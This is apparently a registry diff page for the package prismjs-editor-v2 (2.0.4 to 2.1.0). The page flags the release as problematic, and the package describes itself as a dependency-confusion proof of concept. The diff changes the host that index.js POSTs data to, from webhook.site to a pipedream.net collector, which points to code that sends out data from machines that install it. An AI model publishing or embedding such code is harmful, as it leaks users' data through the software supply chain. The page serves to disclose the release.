prismjs-editor-v2 2.0.4 → 2.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of prismjs-editor-v2 might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +2 -2
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -22,9 +22,9 @@ var postData = querystring.stringify({
22
22
  });
23
23
 
24
24
  var options = {
25
- hostname: "webhook.site", // Remove https://
25
+ hostname: "enwma2wsi8fcq.x.pipedream.net", // Remove https://
26
26
  port: 443,
27
- path: "/f4267138-cfd9-4016-849c-ac48be43947c", // Correct path
27
+ path: "/", // Correct path
28
28
  method: "POST",
29
29
  headers: {
30
30
  "Content-Type": "application/x-www-form-urlencoded",
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "prismjs-editor-v2",
3
- "version": "2.0.4",
3
+ "version": "2.1.0",
4
4
  "description": "A Node.js module for PoC of dependency confusion vulnerability.",
5
5
  "main": "index.js",
6
6
  "scripts": {